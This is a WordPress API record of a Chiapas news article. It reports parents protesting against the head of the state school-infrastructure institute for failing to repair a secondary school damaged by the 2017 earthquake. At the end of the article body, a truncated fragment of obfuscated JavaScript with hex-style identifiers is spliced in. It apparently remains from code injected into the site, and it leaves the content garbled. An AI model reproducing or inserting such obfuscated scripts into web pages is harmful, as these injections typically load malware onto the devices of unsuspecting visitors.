{"id":4892,"date":"2022-09-07T23:12:13","date_gmt":"2022-09-07T23:12:13","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4892"},"modified":"2022-09-07T23:12:14","modified_gmt":"2022-09-07T23:12:14","slug":"acusan-a-titular-del-inifech-enoc-gordillo-por-negligencia","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4892","title":{"rendered":"Acusan a titular del Inifech Enoc Gordillo por negligencia"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1662592192988-1024x576.jpg\" alt=\"\" class=\"wp-image-4893\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1662592192988-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1662592192988-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1662592192988-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1662592192988.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><div> Jairo Camacho. Agencia ReporteCiudadano, 7 de setiembre del 2022. Tuxtla Guti\u00e9rrez.- Padres de familia de la Escuela Secundaria Bicentenario de la Independencia Nacional, procedentes del municipio de Reforma Chiapas se manifestaron en las instalaciones del Instituto Nacional de Infraestructura F\u00edsica y Educativa de Chiapas para se\u00f1alar al titular de la dependencia Enoc Gordillo por negligencia en la atenci\u00f3n a la instituci\u00f3n que result\u00f3 severamente da\u00f1ada por el terremoto del 2017. Los manifestantes lamentaron que, a lo largo de estos cinco a\u00f1os se han expuesto a los 900 alumnos en los dos turnos, por lo que urgieron a que las autoridades tomen cartas en el asunto para que la escuela sea reparada. \u201cHemos sacrificado a varias generaciones, vemos con tristeza que no aterrizan los apoyos. En los discursos se dice que el apoyo a sido para los afectados, pero nosotros estamos arrinconados, aislados en un rinc\u00f3n sin que nos hagan caso\u201d, expresaron. En estos \u00faltimos dos a\u00f1os el titular del Inifech les ha dado a conocer que, existe un proyecto, que existe un fideicomiso para beneficiar la escuela, pero la realidad ha sido otra. El profesor Romeo S\u00e1nchez, director de la escuela expres\u00f3 que, est\u00e1n acuerpados por las autoridades municipales, pues el da\u00f1o al edificio escolar afecta a la poblaci\u00f3n en general. \u201cCuando pas\u00f3 el terremoto comenzamos las gestiones, pero no hemos tenido respuesta positiva. Lo que se requiere es la reconstrucci\u00f3n total del plantel, pues tiene da\u00f1o total. Esa es la raz\u00f3n por la que estamos ac\u00e1, los alumnos est\u00e1n en riesgo y las autoridades simplemente han hecho caso omiso y eso es lo que nos preocupa\u201d, remarc\u00f3.<\/div><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 7 de setiembre del 2022. Tuxtla Guti\u00e9rrez.- Padres de familia de la Escuela Secundaria Bicentenario de la Independencia Nacional, procedentes del municipio de Reforma Chiapas se manifestaron en las instalaciones del Instituto Nacional de Infraestructura F\u00edsica y Educativa de Chiapas para se\u00f1alar al titular de la dependencia Enoc Gordillo por negligencia &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4893,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-4892","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4892","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4892"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4892\/revisions"}],"predecessor-version":[{"id":4894,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4892\/revisions\/4894"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4893"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4892"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4892"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4892"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}